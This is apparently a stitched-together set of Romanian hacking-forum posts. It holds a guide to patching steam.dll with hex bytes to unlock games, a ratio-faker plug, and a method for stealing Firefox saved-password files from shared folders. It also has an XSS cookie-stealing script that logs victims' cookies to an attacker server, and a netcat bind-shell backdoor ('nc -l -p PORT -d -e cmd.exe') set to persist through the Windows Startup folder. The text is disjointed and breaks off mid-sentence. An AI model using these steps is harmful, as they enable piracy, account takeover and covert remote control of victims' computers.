Acest tutorial este creat pentru un 'scop' educational.Fara.cue si cintx nu am avea posibilitati. Hai sa pornim. De ce ai nevoie? OllyDbg (Debugger) Code: Steam (Putrid Filth) Code: Pasul 1 - instalarea steam-ului Odata ce ai descarcat toate programele necesare, primul lucru e: instalarea steam-ului; presupun ca sti cum se instaleaza ( Atentie! Nu-l instalati in folderul cu CS-ul ). Steam-ul se va executa automat, la fel si logarea, dar va trebui sa creezi un cont ( care este gratis ), odata ce ai terminat, logheazate si lasa-l sa-si faca update-ul, pana aici e bine. Odata ce vezi fereastra ( STEAM ) cu jocuri, iti vei da seama ca nu ai nici un joc, aici incepe cracking-ul.Inchide steam-ul ( Tot ce tine de el ),deschide task manager ( CTRL + ALT + DEL ).
Pasul 2 - PreChek-uri Update Creeaza un nou fisier numit steam.cfg in interiorul folderului steam si copiaza: 'BootStrapperInhibitAll=enable' fara ghilimele. Salveaza-l, probabil te intrebi de ce ai facut asta, pentru a impiedica steam-ul sa faca update si sa distruga munca ta anterioara.
Presupun ca ai winrar in PC, arhiveaza steam.dll, daca se produc unele greseli ai de unde sa reincepi. Pasul 3 - OllyDbg Extrage si ruleaza ollydbg, dute la file - open.Deasupra la 'cancel' vor fi 2 fisiere de tip:.exe si.ddl. Alege.dll, localizeaza si deschide steam.dll. Ollydbg are un plugin: loaddll, sa-r putea sa-ti apara din prima pe ecran,daca doresti sa-l folosesti click pe Ok. Dupa o analiza scurta, vor aparea coduri, aceste coduri se numesc ASM si este, mai pe scurt,.exe-ul descompus intr-un format ( pe care oamenii il pot citi ) Pasul 4 - Deblocand GUI Lista de jocuri cu steam sunt ascunse intr-o variatiune de coduri, dar 'hackerii' au gasit o modalitate.
In asa fel incat lista sa fie vizibila si jocabila. Unele sunt descarcabile, dar nu ne bagam. Iata un emulator = 52 8B 44 24 0C C7 00 01 00 00 00 8B 54 24 10 8B 44 24 14 31 C9 89 0A 89 08 89 48 04 89 48 08 88 48 0C B8 01 00 00 00 5A C3 Copiaza emulatorul intr-un notepad, reintoarcete la ollydbg,inchide fereastra precedenta si sa revenim acum la ASM.
Click dreapta - Search for - Label in modulul curent, acesta va afisa o fereastra cu numele functiilor din steam si noi dorim 2 in particular. SteamIsAppSubscribed si SteamIsSubscribed.
Dublu click SteamIsAppSubscribed, vei fi dus la o noua fereastra cu coduri, uitete la 'PUSH EBP'. Click si tine apasat mouse-ul pe aceasta linie si trage-o jos cel putin 14 linii - click dreapta - binary - binary paste. Exact la fel procedeaza cu SteamIsSubscribed.
Pasul 5 - Salvarea Click dreapta - Copy to Executable - All modifications - Copy All. Click dreapta pe noua fereastra - Save File - Ok - Yes. Am terminat un steam.dll crack-uit. Metodele difera putin,important e sa ajungi la acelasi rezultat. Copiati pe ce forum doriti doar nu MODIFICATI.
Pasul1: configurarea pc-ului Descarcati CCProxy si creeati un server proxy. 1.Faceti account aicea: 2.Intrati aicea dupa ce va activati contul prin email: 3.Sper sa va foloseasca deoarece pe site se gasesc de la cliente de torrent modate/hackuite pana la tools precum ratioFaker(care are facut updatu la utorrent 1.8),ratioMaster,mRatio,greedytorrent si multe altele ce vor fi mereu updatate. 4.Testate de mine aproape toate).Merg pe filelist,torrentbits,bittorrents si pe multe alte trackere romanesti. Cu ocazia acestui post as mai vrea sa cer oricui poate sa-mi dea o invitatie pe iplay si pe torrentleech.Multumesc anticipat([email protected]) Da-ti pm cu mailul care vrea invitatie pe romanesc(am 15).
Se pot afla parolele stocate in Mozilla Firefox cautand pe huburile odc, dc, sau chiar pe emule.directoarele sharate de pe 'root' se cauta fisierele signons2.txt si key3.db se baga in decodorul pt. Parole firefox si gata. Fisierele signons2.txt si key3.db sunt localizate in windows XP: C: Documents and Settings Administrator Application Data Mozilla Firefox Profiles (nume aleatoriu).default decodor pt parole firefox cautati pe google sunt multe metoda 2 fara a folosi un decodor: -se copie continutul fisierului signons2 in cadrul celui de pe propriul sistem. Afla parolele folosind firemaster si firepassword: History Version 2.5: 22nd March 2008 Pattern based brute force password recovery method is implemented which reduces the time considerably when certain part of the password is already known. Also minimum length of password can be specified which improves the recovery time greatly. Usage is simplified by forcing one crack method at a time and providing better meaningful options.
Fixed the bug in displaying statistics and now it displays the remaining time accurately based on the current speed which is computed dynamically. Thanks for your suggestions and feedbacks.
Version 2.2: 8th July 2006 FireMaster source code is released under GPL v2. Version 2.1: 18th June 2006 Tested successfully with latest version 1.5.0.4 of Firefox.
Statistics display during the operation is improved. Version 2.0: 25th Feb 2006 First public release of FireMaster SOURCE code. Now it works at amazing speed of 50k passwords per second on normal m/c.
Firefox library dependency is removed completely. For brute force, speed and time is displayed during operation. Lots of optimizations and few bug fixes. Thanks to 'T Barton' for reporting the bug with 1.5 version. Version 1.5: 14th Jan 2006 Bug in parsing key3.db fixed. Displaying results during recovery operation. Speed is doubled compared to the original version.
Version 1.0: 1st Jan 2006 First public release of FireMaster. About FireMaster Firemaster is the Firefox master password recovery tool. Firefox uses master password to protect the stored sign-on information for various websites. If the master password is forgotten, then there is no way to recover the master password and user has to lose all the sign-on information stored in it.
To prevent this problem, I have developed FireMaster which uses combination of techniques such as dictionary, hybrid and brute force to recover the master password from the Firefox key database file. About Firefox Password Manager and Master Password Firefox comes with built-in password manager tool which remembers username and passwords for all the websites you visit. This sign-on information is stored in the encrypted form in Firefox database files residing in user's profile directory.
However any body can just launch the password manager from the Firefox browser and view the credentials. Also one can just copy these database files to different machine and view it offline using the tools such as FirePassword. Hence to protect from such threats, Firefox uses master password to provide enhanced security.
By default Firefox does not set the master password. However once you have set the master password, you need to provide it every time to view sign-on credentials.So if you have lost the master password, then you have lost all the stored credentials as well. So far there was no way to recover these credentials once you have lost the master password. Now the FireMaster can help you to recover the master password and get back all the sign-on information.
Internals of FireMaster Once you have lost master password, there is no way to recover it as it is not stored at all. Whenever user enters the master password, Firefox uses it to decrypt the encrypted data associated with the known string.
If the decrypted data matches this known string then the entered password is correct. FireMaster uses the similar technique to check for the master password, but in more optimized way.
The entire operation goes like this. FireMaster generates passwords on the fly through various methods. Then it computes the hash of the password using known algorithm. Next this password hash is used to decrypt the encrypted data for known plain text (i.e.
Now if the decrypted string matches with the known plain text (i.e. 'password-check') then the generated password is the master password. Firefox stores the details about encrypted string, salt, algorithm and version information in key database file key3.db in the user's profile directory. You can just copy this key3.db file to different directory and specify the corresponding path to FireMaster.
You can also copy this key3.db to any other high end machine for faster recovery operation. FireMaster supports following password generation methods 1) Dictionary Method In this mode, FireMaster uses dictionary file having each word on separate line to perform the operation. You can find lot of online dictionary with different sizes and pass it on to Firemaster. This method is more quicker and can find out common passwords. 2) Hybrid Method This is advanced dictionary method, in which each word in the dictionary file is prefixed or suffixed with generated word from known character list. This can find out password like pass123, 12test, test34 etc.
From the specified character list (such as 123), all combinations of strings are generated and appended or prefixed to the dictionary word based on user settings. 3) Brute Force Method In this method, all possible combinations of words from given character list is generated and then subjected to cracking process. This may take long time depending upon the number of characters and position count specified. How to use FireMaster? First you need to copy the key3.db file to temporary directory. Later you have to specify this directory path for FireMaster as a last argument. Here is the general usage information Firemaster -q -d -f -h -f -n -g 'charlist' -s -p -b -m -l -c 'charlist' -p 'pattern' Dictionary Crack Options: -d Perform dictionary crack -f Dictionary file with words on each line Hybrid Crack Options: -h Perform hybrid crack operation using dictionary passwords.
Marea majoritate ce gasesc posturi ale altor useri de pe acest forum si nu numai, ce contin site-uri vulnerabile la xss, isi pun intrebarea cu ce ii ajuta si cum se extrag. XSS-u este o vulnerabilitate ce permite extragerea cookie-urilor userului care viziteaza link-ul ce contine xss. In cazul in care userul este logat, cookie-ul detine informatiile sesiunii de logare, asta inseamna ca daca il furam si il inlocuim cu al nostru, putem accesa contul victimei fara sa-i stim credintialele. Presupunem ca am gasit o vulnerabilitate xss pe un anumit site. In primul rand avem nevoie de un site sau un server spre care cookie-ul va fi trimis.
Presupunem ca aveti. Puneti pe server un fisier denumit grab.php ce contine urmatorul cod php. Code: $cookie = $HTTPGETVARS'cgrab'; $fh = fopen('cookies.txt', 'a'); fwrite($fh, $cookie. ' n n');?Uneori anumite servere nu permit crearea fisierului cookies.txt in cazul in care acesta nu exista, asa ca e bine sa-l creati voi, creati un fisier denumit 'cookies.txt' si aveti grija ca acesta sa aiba drepturi de read si write. Dupa cum ati vazut, xss-urile care sunt postate in general sunt de forma.
Asta doar demonstreaza ca site-ul este vulnerabil la xss. Scriptul pe care voi trebuie sa-l folositi este acesta. MAI intai trebuie sa faceti rost de doua programe 1)nC.exe (net capture)-cred ca stie toata lume ce face!!! Nu mai e cazul sa explic. 2)Quick Batch File-Transforma un fisier cu extensia bat in unul cu extensia exe,si cel mai important are o optiune care permite rulare fisierelor in hide mode Boon si acum sa incepem.
Luam un folder si bagam in el nC.exe Porgramul nC.exe poate face un shell la CMD folosind un port ales de noi.Asta o facem cu: nc -l -p PORT-ul -d -e cmd.exe iar apoi ne conectam la computer folosind comanda Telnet IP port (exemplu telnet 54.76. ) ori putty; care il vreti mie sincer imi place mai mult putty Daa. Toate bune si frumoase in schimb ne izbim de o mare problema folosind comanda nc -l -p PORT-ul -d -e cmd.exe nu ne putem conecta de mai multe ori asfel dupa fiecare conectare portul este inchis automat!! Cea ce nu este bine de aceea folosim un mic artificiu sa facem un program care sa imi permita sa ma pot connecta de mai multe ori la computerul victimei in folderul de care spuneam mai devreme punem doua fisiere care au extensia bat.Iar apoi incepem sa le scriem asfel; Doua fisiere 1)Start.bat 2)System.bat In fisierul Start.bat scriem: copy nc.exe c:windowstemp copy System.exe c:windowstemp c: cd cd 'Cocuments and SettingsAll UsersStart MenuProgramsStartup' copy c:windowstempSystem.exe System.exe Ce face acest program?!
Simplu copie cele doua fisiere in c:windowstemp si apoi copie un singur fisier (system.exe)in Cocuments and SettingsAll UsersStart MenuProgramsStartup Boon assta inseamna ca de fiecare data cand ala aprinde calc i se va executa automat System.exe dar ce e asa de important D`le fisieru asta?!